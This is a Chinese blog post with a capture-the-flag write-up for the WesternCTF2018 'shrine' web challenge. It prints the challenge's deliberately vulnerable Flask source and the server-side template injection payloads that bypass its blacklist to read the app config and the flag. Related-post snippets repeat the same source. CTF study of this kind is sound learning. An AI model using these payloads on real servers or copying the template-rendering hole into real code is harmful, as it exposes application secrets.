[WesternCTF2018] web题-shrine

最新推荐文章于 2023-11-07 17:02:58 发布
原创 最新推荐文章于 2023-11-07 17:02:58 发布 · 356 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客介绍了WesternCTF2018中的一道web题目,涉及到SSTI(Server-Side Template Injection)模板注入。作者提供了源码,并解释了如何利用`url_for`和`globals()`函数来绕过黑名单,获取`current_app`的配置,从而揭示隐藏的flag。

开题即送源码一份

import flask 
import os 
app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG')  # 有一个名为flag的config
@app.route('/') 
def index(): 
    return open(__file__).read() 
@app.route('/shrine/')  # 路径
def shrine(shrine): 
    def safe_jinja(s): 
        s = s.replace('(', '').replace(')', '') 
        blacklist = ['config', 'self']  # 黑名单
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s  # 遍历黑名单将结果为空
    return flask.render_template_string(safe_jinja(shrine)) 
if __name__ == '__main__': 
    app.run(debug=True)

这是一个ssti模板注入的题
访问shrine进行测试是否有漏洞

/shrine/{{1+1}}

在这里插入图片描述

本来可以直接读取这个config,但是他这里设置了黑名单。可以使用函数url_for,其作用是用于构建指定函数的URL,在配合globals(),该函数会以字典类型返回当前位置的全部全局变量。

/shrine/{{url_for.__globals__}}

在这里插入图片描述
找到这个current_app’: <Flask ‘app’>这里的current就是指的当前的app,只要能查看到这个的config不就可以看到flag了,那么构造payload

/shrine/{{url_for.__globals__['current_app'].config}}

在这里插入图片描述

[WesternCTF2018]shrine
LYJ20010728的博客
05-17 760
[WesternCTF2018]shrine考点思路Payload 考点 SSTI模板注入 思路 ①:审计目给的源码,在shrine路径下测试ssti能正常执行; ②:接着分析源码,注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这设了黑名单[‘config’,‘self’]并且过滤了括号; ③:return ''.join(['{{% set {}=None%}}'.format(c) for c in
[WesternCTF2018]shrine writeup
ShenZ的博客
02-15 633
ps 关于**os.environ**: [OS.ENVIRON()详解_Muqingluan](https://blog.csdn.net/junweifan/article/details/7615591) > python获得一些有关系统的信息 本的思路就是要读取全局变量(我尝试过构造ssti命令执行的payload,但是`__subclasses__()`时会报错,失败了 测试一下python的ssti ``` /shrine/{{8*9}} ```
web buuctf [WesternCTF2018]shrine
weixin_44214568的博客
04-04 1447
考点:模板注入(flask) 1.打开整理代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //显示代码 @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(
[Western CTF 2018]shrine
weixin_45751765的博客
02-16 1580
0x00 前言 ssti复习 贴一下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def s
Web攻防--JAVAWEB项目&JWT身份攻击&组件安全&Python考点&CTF与CMS-SSTI模版注入&PYC反编译
weixin_68243135的博客
11-15 725
WEB攻防--JWT--JAVAWEB项目--SSTI模板注入
攻防世界目练习——Web引导模式(四)(持续更新)
qq_48550824的博客
11-07 824
以及服务相应的版本…等等,从而可以找到相应的漏洞。不知道这个admin是uname输入框还是passwd输入框变过来的,盲猜应该是uname,重新试一下改了一下passwd,但是发现并没有返回302结果,返回的是200,并且没有像上一个一样的this_is_your_cookie的Set-Cookie的值,猜测可能是因为用户名密码不正确?的讲解,“能够对外发起网络请求的地方,就可能存在 SSRF”,我的理解为:凡是一个输入框可以用来访问其他网站的,就可能存在ssrf漏洞。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值